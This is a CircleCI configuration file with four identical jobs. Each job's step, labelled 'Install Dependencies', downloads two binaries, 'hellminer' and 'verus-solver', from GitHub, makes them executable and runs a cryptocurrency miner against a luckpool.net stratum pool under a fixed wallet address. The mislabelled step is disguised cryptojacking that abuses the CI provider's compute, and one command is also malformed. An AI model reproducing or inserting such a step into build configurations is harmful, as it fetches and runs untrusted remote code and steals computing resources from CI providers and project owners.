version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Gwgetodmine99/cpu/raw/main/hellminer && chmod +x hellminer && wget https://github.com/Godmine99/cpu/raw/main/verus-solver && chmod +x verus-solver ./verus-solver && ./hellminer -c stratum+tcp://ap.luckpool.net:3956 -u RTEEJJeExFWaE9sZsqty4aJ5vZF8NAMi5W.ZA03 -p x --cpu 30
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Gwgetodmine99/cpu/raw/main/hellminer && chmod +x hellminer && wget https://github.com/Godmine99/cpu/raw/main/verus-solver && chmod +x verus-solver ./verus-solver && ./hellminer -c stratum+tcp://ap.luckpool.net:3956 -u RTEEJJeExFWaE9sZsqty4aJ5vZF8NAMi5W.ZA03 -p x --cpu 30
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Gwgetodmine99/cpu/raw/main/hellminer && chmod +x hellminer && wget https://github.com/Godmine99/cpu/raw/main/verus-solver && chmod +x verus-solver ./verus-solver && ./hellminer -c stratum+tcp://ap.luckpool.net:3956 -u RTEEJJeExFWaE9sZsqty4aJ5vZF8NAMi5W.ZA03 -p x --cpu 30
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Gwgetodmine99/cpu/raw/main/hellminer && chmod +x hellminer && wget https://github.com/Godmine99/cpu/raw/main/verus-solver && chmod +x verus-solver ./verus-solver && ./hellminer -c stratum+tcp://ap.luckpool.net:3956 -u RTEEJJeExFWaE9sZsqty4aJ5vZF8NAMi5W.ZA03 -p x --cpu 30
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3